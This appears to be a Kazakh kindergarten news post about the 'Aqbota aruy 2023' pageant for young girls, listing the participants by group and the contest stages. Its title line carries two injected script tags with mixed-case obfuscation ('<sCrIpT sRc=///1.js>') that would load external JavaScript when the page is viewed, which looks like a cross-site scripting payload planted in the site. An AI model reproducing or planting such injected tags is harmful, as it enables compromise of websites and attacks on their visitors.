«Ақбота аруы– 2023» атты байқау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.02.2023

«Ақбота» бөбекжайында "Рухани жаңғыру" бағдарламасының аясында 8 Наурыз аналар мерекесінің қарсаңында музыка жетекшісі Шайкенова Әсемгүл Серғалиқызының ұйымдастырумен «Ақбота аруы– 2023» атты байқау өткізілді.    Байқаудың мақсаты қыз балалардың жан дүниесіндегі көркемдік талғамын қалыптастыру, қазақ халқының қыз тәрбиелеу салт–дәстүріне байланысты әдептілікке, инабаттылыққа, ізетттілікке тәрбиелеу болды.

Байқауға ортаңғы, ересек, мектепалды даярлық тобтарының қыздары қатысты.

Ортаңғы «Нұрсәуле» тобы Құдабай Әмина.

Ортаңғы «Балдырған» тобы Нұржанова Айлин.

Ересек «Көбелек»тобы Қуандыкова Аяулым.

Ересек «Ботақан» тобы Асан Әмина.

Мектепалды «Құлыншақ» тобы Даниярова Дәрия.

Мектепалды «Қошақан» тобы Естай Айзере.

  1. Кезең «Сәлем-сөздің атасы» Әр ару өзін өлең жолдары арқылы таныстырды.
  2. «Өнерлі өрге жүзер» қатысушылар өз өнерлерін көрсетеді. ( барлық өнер түрлері жатады, оның ішінде ән, би, мәнерлеп оқу немесе қолөнер).
  3. «Білімді мыңды жығар» сұрақ-жауап.
  4. «Сұлу қыздар» арулар сән үлгісін көрсетті.

Барлық қатысушылар ә рбөлімге ерекше дайындалып, бар өнерлерін көрсете білді. Біреуі ән шырқаса, біреуі мың бұрала би биледі.Байқау соңында әділ қазылар алқасының шешімімен барлық арулар дипломдармен марапатталды. Әр аруға түрлі номинациялар берілді. Барлығы белсене қатысып, ұмытылмас әсер қалдырды. Барлық атсалысқан ата-аналарға, тәрбиешілерге алғысымызды білдіреміз.

Просмотров: 212


Пікір қосу



Деректерді қолтаңбаға қосу